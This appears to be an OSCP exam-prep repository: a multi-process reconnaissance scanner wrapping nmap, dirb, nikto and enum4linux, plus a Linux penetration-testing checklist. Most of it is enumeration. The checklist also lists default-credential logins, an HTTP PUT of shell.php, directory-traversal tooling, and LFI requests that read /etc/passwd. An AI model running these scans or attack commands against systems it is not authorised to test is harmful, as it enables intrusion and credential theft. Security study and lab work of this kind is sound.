├── README.md
├── recon_enum
│   └── reconscan.py
├── reports
│   └── reports.txt
├── setup.sh
└── templates
    ├── linux-template.md
    └── windows-template.md

/README.md:
--------------------------------------------------------------------------------
# oscp

## Reconscan.py

This script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/), but it has been heavily rewritten: some things have been added and other things removed. The script was written as preparation for the OSCP exam and was never meant to be a general-purpose script, so if you want to use it you have to make sure to fix all the hardcoded paths. The script runs each scan in its own process and can be run against several hosts at once.

The script is invoked like this:

```
python reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103
```

One important thing to note is that I removed the scan for all ports, because it would sometimes just take too long to run. So make sure you either add that scan or run it afterwards, so you don't miss any ports.

Please note that the script includes dirb and nikto scans that are very invasive. The script also includes several nmap scripts that check for vulnerabilities. So yeah, this script would be pretty illegal and bad to run against a machine you don't have permission to attack.

## Templates

I created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for Windows. There are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**.

The templates are written in markdown, but I never actually rendered them, so I don't really know how they look rendered. They are probably pretty messy. I also used them together with markdown syntax highlighting in my editor, so it became easy to navigate the files.

The templates have a few keywords in them, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, which inserts the target machine's IP address automatically. Some other things are also inserted automatically, like a basic nmap scan and a nikto scan.

Wherever there are references to a book, this is the book: https://bobloblaw.gitbooks.io/security/content/

--------------------------------------------------------------------------------
/recon_enum/reconscan.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
import subprocess
import multiprocessing
from multiprocessing import Process, Queue
import os
import time
import fileinput
import atexit
import sys
import socket
import re

# Todo:
# Add mysql nmap-script
# Change replace to sed:
# sed 's|literal_pattern|replacement_string|g'

start = time.time()

class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


# Creates a function for multiprocessing. Several things at once.
def multProc(targetin, scanip, port):
    jobs = []
    p = multiprocessing.Process(target=targetin, args=(scanip, port))
    jobs.append(p)
    p.start()
    return

def connect_to_port(ip_address, port, service):

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)  # a service that never sends a banner would otherwise block recv() forever
    try:
        s.connect((ip_address, int(port)))
        banner = s.recv(1024)

        if service == "ftp":
            s.send("USER anonymous\r\n")
            user = s.recv(1024)
            s.send("PASS anonymous\r\n")
            password = s.recv(1024)
            total_communication = banner + "\r\n" + user + "\r\n" + password
            write_to_file(ip_address, "ftp-connect", total_communication)
        elif service == "smtp":
            total_communication = banner + "\r\n"
            write_to_file(ip_address, "smtp-connect", total_communication)
        elif service == "ssh":
            total_communication = banner
            write_to_file(ip_address, "ssh-connect", total_communication)
        elif service == "pop3":
            s.send("USER root\r\n")
            user = s.recv(1024)
            s.send("PASS root\r\n")
            password = s.recv(1024)
            total_communication = banner + user + password
            write_to_file(ip_address, "pop3-connect", total_communication)
    except socket.error as e:
        print bcolors.WARNING + "WARN: " + service + " banner grab on " + ip_address + ":" + str(port) + " failed: " + str(e) + bcolors.ENDC
    finally:
        s.close()


def write_to_file(ip_address, enum_type, data):

    file_path_linux = '../reports/%s/mapping-linux.md' % (ip_address)
    file_path_windows = '../reports/%s/mapping-windows.md' % (ip_address)
    paths = [file_path_linux, file_path_windows]
    print bcolors.OKGREEN + "INFO: Writing " + enum_type + " to template files:\n " + file_path_linux + " \n" + file_path_windows + bcolors.ENDC

    # Which template hook each kind of enumeration output fills in.
    hooks = {
        "portscan": "INSERTTCPSCAN",
        "dirb": "INSERTDIRBSCAN",
        "nikto": "INSERTNIKTOSCAN",
        "ftp-connect": "INSERTFTPTEST",
        "smtp-connect": "INSERTSMTPCONNECT",
        "ssh-connect": "INSERTSSHCONNECT",
        "pop3-connect": "INSERTPOP3CONNECT",
        "curl": "INSERTCURLHEADER",
    }
    if enum_type not in hooks:
        return

    # The original shelled out to `replace HOOK "<data>" -- <path>` with the scan
    # output concatenated straight into the command line. That output comes from the
    # target (banners, HTTP headers, tool output), so a quote or shell metacharacter
    # in it broke the command or was interpreted by the shell on the scanning host.
    # Doing the substitution in Python keeps scan output out of any shell.
    for path in paths:
        with open(path) as f:
            content = f.read()
        with open(path, "w") as f:
            f.write(content.replace(hooks[enum_type], data))
    return


# dirb accepts several wordlists as one comma-separated argument (no spaces).
def dirb(ip_address, port, url_start, wordlist="/usr/share/wordlist/dirb/big.txt,/usr/share/wordlist/dirb/vulns/cgis.txt"):
    print bcolors.HEADER + "INFO: Starting dirb scan for " + ip_address + bcolors.ENDC
    # Argument order follows the placeholders: scheme, host, port, wordlist, then the IP twice for the report path.
    DIRBSCAN = "dirb %s://%s:%s %s -o ../reports/%s/dirb-%s.txt -r" % (url_start, ip_address, port, wordlist, ip_address, ip_address)
    print bcolors.HEADER + DIRBSCAN + bcolors.ENDC
    results_dirb = subprocess.check_output(DIRBSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with dirb scan for " + ip_address + bcolors.ENDC
    print results_dirb
    write_to_file(ip_address, "dirb", results_dirb)
    return

def nikto(ip_address, port, url_start):
    print bcolors.HEADER + "INFO: Starting nikto scan for " + ip_address + bcolors.ENDC
    NIKTOSCAN = "nikto -h %s://%s -o ../reports/%s/nikto-%s-%s.txt" % (url_start, ip_address, ip_address, url_start, ip_address)
    print bcolors.HEADER + NIKTOSCAN + bcolors.ENDC
    results_nikto = subprocess.check_output(NIKTOSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with NIKTO-scan for " + ip_address + bcolors.ENDC
    print results_nikto
    write_to_file(ip_address, "nikto", results_nikto)
    return

def httpEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected http on " + ip_address + ":" + port + bcolors.ENDC
    print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC

    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address, port, "http"))
    dirb_process.start()
    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address, port, "http"))
    nikto_process.start()

    # Query the port that was actually detected, not always port 80.
    CURLSCAN = "curl -I http://%s:%s" % (ip_address, port)
    print bcolors.HEADER + CURLSCAN + bcolors.ENDC  # was bcolors.END, which does not exist
    curl_results = subprocess.check_output(CURLSCAN, shell=True)
    write_to_file(ip_address, "curl", curl_results)
    HTTPSCAN = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + HTTPSCAN + bcolors.ENDC

    http_results = subprocess.check_output(HTTPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTP-SCAN for " + ip_address + bcolors.ENDC
    print http_results

    return

def httpsEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected https on " + ip_address + ":" + port + bcolors.ENDC
    print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC

    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address, port, "https"))
    dirb_process.start()
    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address, port, "https"))
    nikto_process.start()

    SSLSCAN = "sslscan %s:%s >> ../reports/%s/ssl_scan_%s" % (ip_address, port, ip_address, ip_address)
    print bcolors.HEADER + SSLSCAN + bcolors.ENDC
    ssl_results = subprocess.check_output(SSLSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with SSLSCAN for " + ip_address + bcolors.ENDC

    # Written to <ip>_https.nmap so a host with both http and https does not overwrite the http results.
    HTTPSCANS = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_https.nmap %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + HTTPSCANS + bcolors.ENDC
    https_results = subprocess.check_output(HTTPSCANS, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTPS-scan for " + ip_address + bcolors.ENDC
    print https_results
    return

def mssqlEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected MS-SQL on " + ip_address + ":" + port + bcolors.ENDC
    print bcolors.HEADER + "INFO: Performing nmap mssql script scan for " + ip_address + ":" + port + bcolors.ENDC
    # Four placeholders need four arguments; the original passed three and raised TypeError.
    MSSQLSCAN = "nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes,mysql-empty-password,mysql-brute,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 --script-args=mssql.instance-port=1433,mssql.username=sa,mssql.password=sa -oN ../reports/%s/mssql_%s.nmap %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + MSSQLSCAN + bcolors.ENDC
    mssql_results = subprocess.check_output(MSSQLSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with MSSQL-scan for " + ip_address + bcolors.ENDC
    print mssql_results
    return


def smtpEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected smtp on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "smtp")
    SMTPSCAN = "nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN ../reports/%s/smtp_%s.nmap" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + SMTPSCAN + bcolors.ENDC
    smtp_results = subprocess.check_output(SMTPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMTP-scan for " + ip_address + bcolors.ENDC
    print smtp_results
    # write_to_file(ip_address, "smtp", smtp_results)
    return

def smbNmap(ip_address, port):
    print "INFO: Detected SMB on " + ip_address + ":" + port
    smbNmap = "nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos %s -oN ../reports/%s/smb_%s.nmap" % (ip_address, ip_address, ip_address)
    smbNmap_results = subprocess.check_output(smbNmap, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMB-Nmap-scan for " + ip_address + bcolors.ENDC
    print smbNmap_results
    return

def smbEnum(ip_address, port):
    print "INFO: Detected SMB on " + ip_address + ":" + port
    enum4linux = "enum4linux -a %s > ../reports/%s/enum4linux_%s 2>/dev/null" % (ip_address, ip_address, ip_address)
    enum4linux_results = subprocess.check_output(enum4linux, shell=True)
    print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with ENUM4LINUX-Nmap-scan for " + ip_address + bcolors.ENDC
    print enum4linux_results
    return

def ftpEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected ftp on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "ftp")
    FTPSCAN = "nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '../reports/%s/ftp_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + FTPSCAN + bcolors.ENDC
    results_ftp = subprocess.check_output(FTPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with FTP-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_ftp
    return

def udpScan(ip_address):
    print bcolors.HEADER + "INFO: Detected UDP on " + ip_address + bcolors.ENDC
    UDPSCAN = "nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/%s/udp_%s.nmap' %s" % (ip_address, ip_address, ip_address)
    print bcolors.HEADER + UDPSCAN + bcolors.ENDC
    udpscan_results = subprocess.check_output(UDPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with UDP-Nmap scan for " + ip_address + bcolors.ENDC
    print udpscan_results
    UNICORNSCAN = "unicornscan -mU -I %s > ../reports/%s/unicorn_udp_%s.txt" % (ip_address, ip_address, ip_address)
    unicornscan_results = subprocess.check_output(UNICORNSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with UNICORNSCAN for " + ip_address + bcolors.ENDC

def sshScan(ip_address, port):
    print bcolors.HEADER + "INFO: Detected SSH on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "ssh")
    SSHSCAN = "nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/%s/ssh_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + SSHSCAN + bcolors.ENDC
    results_ssh = subprocess.check_output(SSHSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SSH-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_ssh
    return

def pop3Scan(ip_address, port):
    print bcolors.HEADER + "INFO: Detected POP3 on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "pop3")
    POP3SCAN = "nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '../reports/%s/pop3_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + POP3SCAN + bcolors.ENDC  # the original printed SSHSCAN here, which is undefined in this function
    results_pop3 = subprocess.check_output(POP3SCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with POP3-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_pop3
    return

def snmpEnum(ip_address, port):
    # Added here: the dispatcher in nmapScan() calls snmpEnum, but the original file never
    # defined it. The script list is the one the templates use for SNMP.
    print bcolors.HEADER + "INFO: Detected SNMP on " + ip_address + ":" + port + bcolors.ENDC
    SNMPSCAN = "nmap -sV -Pn -p %s --script=snmp-netstat,snmp-processes -oN '../reports/%s/snmp_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + SNMPSCAN + bcolors.ENDC
    results_snmp = subprocess.check_output(SNMPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SNMP-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_snmp
    return


def nmapScan(ip_address):
    ip_address = ip_address.strip()
    print bcolors.OKGREEN + "INFO: Running general TCP/UDP nmap scans for " + ip_address + bcolors.ENDC


    TCPSCAN = "nmap -sV -O %s -oN '../reports/%s/%s.nmap'" % (ip_address, ip_address, ip_address)
    print bcolors.HEADER + TCPSCAN + bcolors.ENDC
    results = subprocess.check_output(TCPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with BASIC Nmap-scan for " + ip_address + bcolors.ENDC
    print results

    # Use this function's own argument; the original referenced the global scanip from __main__.
    p = multiprocessing.Process(target=udpScan, args=(ip_address,))
    p.start()

    write_to_file(ip_address, "portscan", results)
    lines = results.split("\n")
    serv_dict = {}
    for line in lines:
        ports = []
        line = line.strip()
        if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
            # print line
            # collapse runs of spaces so the columns split cleanly
            while "  " in line:
                line = line.replace("  ", " ")
            linesplit = line.split(" ")
            service = linesplit[2]  # grab the service name

            port = line.split(" ")[0]  # grab the port/proto
            # print port
            if service in serv_dict:
                ports = serv_dict[service]  # if the service is already in the dict, grab the port list

            ports.append(port)
            # print ports
            serv_dict[service] = ports  # add service to the dictionary along with the associated port(s)



    # go through the service dictionary to call additional targeted enumeration functions
    for serv in serv_dict:
        ports = serv_dict[serv]
        # re.match anchors at the start and the lookahead rejects "https". The original
        # pattern r"http[^s]" required a character after "http", so a service reported
        # as plain "http" never matched and HTTP enumeration was skipped.
        if re.match(r"http(?!s)", serv):
            for port in ports:
                port = port.split("/")[0]
                multProc(httpEnum, ip_address, port)
        elif re.search(r"https|ssl", serv):
            for port in ports:
                port = port.split("/")[0]
                multProc(httpsEnum, ip_address, port)
        elif "smtp" in serv:
            for port in ports:
                port = port.split("/")[0]
                multProc(smtpEnum, ip_address, port)
        elif "ftp" in serv:
            for port in ports:
                port = port.split("/")[0]
                multProc(ftpEnum, ip_address, port)
        elif ("microsoft-ds" in serv) or ("netbios-ssn" == serv):
            for port in ports:
                port = port.split("/")[0]
                multProc(smbEnum, ip_address, port)
                multProc(smbNmap, ip_address, port)
        elif "ms-sql" in serv:
            for port in ports:
                port = port.split("/")[0]
                multProc(mssqlEnum, ip_address, port)
        elif "ssh" in serv:
            for port in ports:
                port = port.split("/")[0]
                multProc(sshScan, ip_address, port)
        elif "pop3" in serv:
            # pop3Scan existed in the original but was never dispatched.
            for port in ports:
                port = port.split("/")[0]
                multProc(pop3Scan, ip_address, port)
        elif "snmp" in serv:
            for port in ports:
                port = port.split("/")[0]
                multProc(snmpEnum, ip_address, port)

    return


print bcolors.HEADER
print "------------------------------------------------------------"
print "!!!!                 RECON SCAN                          !!!!!"
print "!!!!       A multi-process service scanner               !!!!!"
print "!!!!  dirb, nikto, ftp, ssh, mssql, pop3, tcp            !!!!!"
print "!!!!  udp, smtp, smb                                     !!!!!"
print "------------------------------------------------------------"



if len(sys.argv) < 2:
    print ""
    print "Usage: python reconscan.py "
    print "Example: python reconscan.py 192.168.1.101 192.168.1.102"
    print ""
    print "############################################################"
    sys.exit()

print bcolors.ENDC

if __name__ == '__main__':

    # Setting ip targets
    targets = sys.argv
    targets.pop(0)

    dirs = os.listdir("../reports/")
    for scanip in targets:
        scanip = scanip.rstrip()
        if not scanip in dirs:
            print bcolors.HEADER + "INFO: No folder was found for " + scanip + ". Setting up folder." + bcolors.ENDC
            subprocess.check_output("mkdir ../reports/" + scanip, shell=True)
            subprocess.check_output("mkdir ../reports/" + scanip + "/exploits", shell=True)
            subprocess.check_output("mkdir ../reports/" + scanip + "/privesc", shell=True)
            print bcolors.OKGREEN + "INFO: Folder created here: " + "../reports/" + scanip + bcolors.ENDC
            subprocess.check_output("cp ../templates/windows-template.md ../reports/" + scanip + "/mapping-windows.md", shell=True)
            subprocess.check_output("cp ../templates/linux-template.md ../reports/" + scanip + "/mapping-linux.md", shell=True)
            print bcolors.OKGREEN + "INFO: Added pentesting templates: " + "../reports/" + scanip + bcolors.ENDC
            subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-windows.md", shell=True)
            subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-linux.md", shell=True)



        p = multiprocessing.Process(target=nmapScan, args=(scanip,))
        p.start()
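The heart of reconscan.py is the loop in nmapScan() that turns nmap's normal output into a service-to-ports dictionary and then picks an enumeration function per service. The following is an added example (Python 3, not code from the xapax/oscp repository or from Mike Czumak's original) that reimplements that parse-and-dispatch step over a constructed nmap output sample. It goes a little beyond the script: the port line is matched with an anchored regex so that "filtered" ports and stray lines containing the word "open" are ignored, and the service classifier handles the edge cases a scan actually produces, including a plain "http" service, which the script's original pattern r"http[^s]" could never match because it required a character after "http". The handler names are those of the script's functions; SAMPLE_NMAP_OUTPUT and DISPATCH_RULES are constructed for this example.

```python
# Added example: parse nmap -oN output into {service: [ports]} and classify each
# service the way reconscan.py's dispatcher does, with the edge cases handled.
import re

# Constructed sample of nmap -sV normal output (not a real scan result).
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.01 scan initiated as: nmap -sV -O 10.0.0.5
Nmap scan report for 10.0.0.5
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         vsftpd 3.0.2
22/tcp   open     ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
25/tcp   filtered smtp
80/tcp   open     http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp  open     pop3        Dovecot pop3d
443/tcp  open     ssl/http    Apache httpd 2.4.7 ((Ubuntu))
445/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8080/tcp open     http-proxy  Squid http proxy 3.3.8
Service Info: OS: Linux
"""

# One open TCP port line: "<port>/tcp  open  <service>  [version ...]".
# Anchoring on the port column means "filtered" lines and "Discovered open port"
# lines from a verbose scan never match.
OPEN_TCP_LINE = re.compile(r"^(?P<port>\d+)/tcp\s+open\s+(?P<service>\S+)")


def parse_open_tcp_services(nmap_output):
    """Return {service_name: [port, ...]} for every open TCP port in -oN output."""
    services = {}
    for line in nmap_output.splitlines():
        m = OPEN_TCP_LINE.match(line.strip())
        if m:
            services.setdefault(m.group("service"), []).append(int(m.group("port")))
    return services


# Dispatch rules in priority order: (predicate over the nmap service name, handler).
# Handler names are reconscan.py's functions; the SMB handler stands for the pair
# smbEnum + smbNmap the script starts together.
DISPATCH_RULES = [
    (lambda s: re.match(r"http(?!s)", s) is not None, "httpEnum"),    # http, http-proxy, http-alt
    (lambda s: re.search(r"https|ssl", s) is not None, "httpsEnum"),  # https, ssl/http
    (lambda s: "smtp" in s, "smtpEnum"),
    (lambda s: "ftp" in s, "ftpEnum"),
    (lambda s: "microsoft-ds" in s or s == "netbios-ssn", "smbEnum"),
    (lambda s: "ms-sql" in s, "mssqlEnum"),
    (lambda s: "ssh" in s, "sshScan"),
    (lambda s: "pop3" in s, "pop3Scan"),
    (lambda s: "snmp" in s, "snmpEnum"),
]


def classify_service(service):
    """Map an nmap service name to its enumeration handler, or None when no rule applies."""
    for matches, handler in DISPATCH_RULES:
        if matches(service):
            return handler
    return None


def plan_enumeration(nmap_output):
    """Sorted (port, handler) pairs for every open TCP port that has a handler."""
    plan = []
    for service, ports in parse_open_tcp_services(nmap_output).items():
        handler = classify_service(service)
        if handler is None:
            continue  # e.g. an unknown service: nothing targeted to run
        for port in ports:
            plan.append((port, handler))
    return sorted(plan)


if __name__ == "__main__":
    for port, handler in plan_enumeration(SAMPLE_NMAP_OUTPUT):
        print("%5d -> %s" % (port, handler))
```

On the sample above the plan skips the filtered SMTP port, sends 80 and 8080 to httpEnum, 443 (reported as ssl/http) to httpsEnum, and 445 to the SMB handler; a service with no rule simply produces no entry.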
--------------------------------------------------------------------------------
/reports/reports.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xapax/oscp/7ea469640337ca5ab282ba44e39665b398b32255/reports/reports.txt
--------------------------------------------------------------------------------
/setup.sh:
--------------------------------------------------------------------------------
#!/bin/bash

folder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null)
echo -e '#!/bin/bash\n' > /usr/bin/reconscan
# Quote the folder so the wrapper still works if the path contains spaces.
echo -e "cd \"$folder\" && python reconscan.py \"\$@\" \n" >> /usr/bin/reconscan
chmod +x /usr/bin/reconscan

--------------------------------------------------------------------------------
/templates/linux-template.md:
--------------------------------------------------------------------------------
## Info-sheet

- DNS-Domain name:
- Host name:
- OS:
- Server:
- Kernel:
- Workgroup:
- Windows domain:

Services and ports:
INSERTTCPSCAN

## Recon

```
Always start with a stealthy scan to avoid closing ports.

# Syn-scan
nmap -sS INSERTIPADDRESS

# Scan all ports, might take a while.
nmap INSERTIPADDRESS -p-

# Service-version, default scripts, OS:
nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333

# Scan for UDP
nmap INSERTIPADDRESS -sU
unicornscan -mU -v -I INSERTIPADDRESS

# Connect to udp if one is open
nc -u INSERTIPADDRESS 48772

# Monster scan
nmap INSERTIPADDRESS -p- -A -T4 -sC
```


### Port 21 - FTP

- FTP-Name:
- FTP-version:
- Anonymous login:

INSERTFTPTEST

```
nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS
```

### Port 22 - SSH

- Name:
- Version:
- Takes-password:
- If you have usernames, test login with username:username

INSERTSSHCONNECT

```
nc INSERTIPADDRESS 22
```

### Port 25

- Name:
- Version:
- VRFY:

INSERTSMTPCONNECT

```
nc -nvv INSERTIPADDRESS 25
HELO foo

telnet INSERTIPADDRESS 25
VRFY root

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS
```

### Port 69 - UDP - TFTP

This is used for tftp-server.


### Port 110 - Pop3

- Name:
- Version:

INSERTPOP3CONNECT

```
telnet INSERTIPADDRESS 110
USER pelle@INSERTIPADDRESS
PASS admin

or:

USER pelle
PASS admin

# List all emails
list

# Retrieve email number 9, for example
retr 9
```

### Port 111 - Rpcbind

```
rpcinfo -p INSERTIPADDRESS
```


### Port 135 - MSRPC

Some versions are vulnerable.

### Port 143 - Imap

### Port 139/445 - SMB

- Name:
- Version:
- Domain/workgroup name:
- Domain-sid:
- Allows unauthenticated login:

```
nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse INSERTIPADDRESS -p 445


enum4linux -a INSERTIPADDRESS
rpcclient -U "" INSERTIPADDRESS
    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall

smbclient -L INSERTIPADDRESS
smbclient //INSERTIPADDRESS/tmp
smbclient \\\\INSERTIPADDRESS\\ipc$ -U john
smbclient //INSERTIPADDRESS/ipc$ -U john
```


### Port 161/162 UDP - SNMP

```
nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS
snmp-check -t INSERTIPADDRESS -c public
```

```
# Common community strings
public
private
community
```


### Port 554 - RTSP


### Port 1030/1032/1033/1038

Used by RPC to connect in domain network.

### Port 1521 - Oracle

- Name:
- Version:
- Password protected:

```
tnscmd10g version -h INSERTIPADDRESS
tnscmd10g status -h INSERTIPADDRESS
```

### Port 2049 - NFS

```
showmount -e INSERTIPADDRESS

# If you find anything you can mount it like this:
mount INSERTIPADDRESS:/ /tmp/NFS
mount -t nfs INSERTIPADDRESS:/ /tmp/NFS
```

### Port 2100 - Oracle XML DB

- Name:
- Version:
- Default logins:

```
sys:sys
scott:tiger
```

Default passwords:
https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm


### Port 3306 - MySQL

- Name:
- Version:

```
nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306

mysql --host=INSERTIPADDRESS -u root -p
```

### Port 3339 - Oracle web interface

- Basic info about web service (apache, nginx, IIS)
- Server:
- Scripting language:
- Apache Modules:
- IP-address:

### Port 80 - Web server

- Server:
- Scripting language:
- Apache Modules:
- IP-address:
- Domain-name address:

INSERTCURLHEADER

- Web application (ex, wordpress, joomla, phpmyadmin)
- Name:
- Version:
- Admin-login:

```
# Nikto
nikto -h http://INSERTIPADDRESS

# Nikto with squid proxy
nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444

# CMS Explorer
cms-explorer -url http://INSERTIPADDRESS -type [Drupal, WordPress, Joomla, Mambo]

# WPScan (vp = Vulnerable Plugins, vt = Vulnerable Themes, u = Users)
wpscan --url http://INSERTIPADDRESS
wpscan --url http://INSERTIPADDRESS --enumerate vp
wpscan --url http://INSERTIPADDRESS --enumerate vt
wpscan --url http://INSERTIPADDRESS --enumerate u

# Joomscan
joomscan -u http://INSERTIPADDRESS
joomscan -u http://INSERTIPADDRESS --enumerate-components

# Get header
curl -i INSERTIPADDRESS

# Get everything
curl -i -L INSERTIPADDRESS

# Check for title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Look at page with just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq

# Check if it is possible to upload
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php

dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix
```

#### Nikto scan

INSERTNIKTOSCAN


#### Url brute force

```
# Not recursive
dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt

# Gobuster - remove irrelevant response codes (403 for example)
gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
```

INSERTDIRBSCAN


#### Default/Weak login

Search the documentation for default passwords and test them.

```
site:webapplication.com password
```

```
admin admin
admin password
admin
admin
root root
root admin
root password
root
password
admin
username
username
```


#### LFI/RFI

```
fimap -u "http://INSERTIPADDRESS/example.php?test="

# Ordered output
curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd
/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=
```
